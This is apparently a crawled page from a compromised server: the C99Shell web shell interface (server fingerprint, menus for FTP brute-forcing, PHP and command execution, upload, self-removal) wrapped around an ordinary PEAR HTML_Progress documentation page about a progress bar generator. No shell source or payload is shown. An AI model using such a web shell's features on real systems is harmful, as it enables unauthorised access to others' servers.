!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/doc/HTML_Progress/examples/generator/   drwxr-xr-x
Free 13.43 GB of 61.93 GB (21.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     htmlpage.html (3.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
PEAR::HTML::Progress example: HTMLPage ProgressBar Generator

Examples TOCexamples

HTMLPage ProgressBar Generator

$Date: 2005/07/25 12:52:15 $

 Table of contents

Introduction

This example requires :

  • PEAR::HTML_Progress_Generator 1.2.2 or better (see source at line 12).

Be aware that:

  • HTML_Progress_Generator has dependencies (HTML_QuickForm 3.2.4+, HTML_QuickForm_Controller 1.0.4+)


This example will run a ProgressBar Controller Wizard using the HTMLPage QF rendering. It will help you to create your own progress bar. You may even save the CSS and/or PHP code at end !

Few lines of code are necessary to run this generator. First we start a session at line 14 (to keep data), then we create a HTML_Progress_Generator instance at line 16 without options, and finally run the controller wizard itself at line 17.

Difference from previous example is to use the HTMLPage QF rendering as ActionDisplay (see line 12).

[Top]

 Render options

Uses defaults:
  • Controller name = ProgressGenerator
  • preview Action = ActionPreview => HTML/Progress/generator/preview.php
  • process Action = ActionProcess => HTML/Progress/generator/process.php
Display render is overloaded by :
  • display Action = ActionDisplay => HTML/Progress/generator/HTMLPage.php
As we still use the default class name 'ActionDisplay', no need to tell it with the second parameter of HTML_Progress_Generator class constructor.
See a script example of
how to customize all actions (preview, display, process).

[Top]

 Output

Screenshot

[Top]

 PHP source syntax highlight

Open source listing in a new window.

[Top]

 Play generator

Run the script.

[Top]


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4695 ]--